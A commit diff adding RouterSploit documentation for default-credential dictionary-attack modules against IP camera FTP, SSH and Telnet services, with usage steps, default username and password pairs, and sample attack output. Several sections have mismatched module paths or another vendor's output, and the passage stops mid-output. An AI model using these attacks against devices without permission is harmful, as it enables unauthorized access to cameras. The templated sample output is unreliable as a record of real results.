Unverified Commit ed19c564 by Marcin Bury Committed by GitHub

Adding basic docs for creds modules (#443)

parent d64359b8
...@@ -12,4 +12,4 @@ Provide steps to test or reproduce the PR. ...@@ -12,4 +12,4 @@ Provide steps to test or reproduce the PR.
- [ ] `run` - [ ] `run`
- [ ] ... - [ ] ...
- [ ] Write tests ([Example](https://github.com/threat9/routersploit/blob/master/tests/exploits/routers/dlink/test_dsl_2750b_rce.py)) - [ ] Write tests ([Example](https://github.com/threat9/routersploit/blob/master/tests/exploits/routers/dlink/test_dsl_2750b_rce.py))
- [ ] Document how it works - [ ] Document how it works ([Example](https://github.com/threat9/routersploit/blob/master/docs/modules/exploits/routers/dlink/dsl_2750b_rce.md))
## Description
Module performs dictionary attack with default credentials against Acti Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/acti/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/acti/ftp_default_creds
rsf (Acti Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Acti Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Acti Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/acti/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/acti/ssh_default_creds
rsf (Acti Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Acti Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Acti Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/acti/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/acti/telnet_default_creds
rsf (Acti Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Acti Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against American Dynamics Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/american_dynamics/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/american_dynamics/ftp_default_creds
rsf (American Dynamics Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (American Dynamics Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against American Dynamics Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/american_dynamics/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/american_dynamics/ssh_default_creds
rsf (American Dynamics Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (American Dynamics Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against American Dynamics Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/american_dynamics/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/american_dynamics/telnet_default_creds
rsf (American Dynamics Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (American Dynamics Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Arecont Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/arecont/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/arecont/ftp_default_creds
rsf (Arecont Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Arecont Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Arecont Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/arecont/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/arecont/ssh_default_creds
rsf (Arecont Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Arecont Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Arecont Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/arecont/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/arecont/telnet_default_creds
rsf (Arecont Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Arecont Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Avigilon Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/avigilon/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/avigilon/ftp_default_creds
rsf (Avigilon Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Avigilon Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Avigilon Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/avigilon/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/avigilon/ssh_default_creds
rsf (Avigilon Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Avigilon Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Avigilon Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/avigilon/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/avigilon/telnet_default_creds
rsf (Avigilon Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Avigilon Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Avtech Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/avtech/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/avtech/ftp_default_creds
rsf (Avtech Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Avtech Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Avtech Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/avtech/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/avtech/ssh_default_creds
rsf (Avtech Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Avtech Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Avtech Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/avtech/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/avtech/telnet_default_creds
rsf (Avtech Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Avtech Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Axis Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/axis/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/axis/ftp_default_creds
rsf (Axis Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Axis Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Axis Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/axis/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/axis/ssh_default_creds
rsf (Axis Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Axis Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Axis Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/axis/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/axis/telnet_default_creds
rsf (Axis Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Axis Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Basler Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/basler/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/basler/ftp_default_creds
rsf (Basler Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Basler Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Basler Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/basler/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/brickcom/ssh_default_creds
rsf (Brickcom Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Brickcom Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Basler Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/basler/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/dlink/telnet_default_creds
rsf (D-Link Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Brickcom Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/brickcom/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/brickcom/ftp_default_creds
rsf (Brickcom Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Brickcom Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Brickcom Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/brickcom/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/brickcom/ssh_default_creds
rsf (Brickcom Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Brickcom Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Brickcom Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/brickcom/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/brickcom/telnet_default_creds
rsf (Brickcom Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Brickcom Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Canon Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/canon/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/canon/ftp_default_creds
rsf (Canon Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Canon Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Canon Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/canon/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/canon/ssh_default_creds
rsf (Canon Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Canon Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Canon Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/canon/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/canon/telnet_default_creds
rsf (Canon Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Canon Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
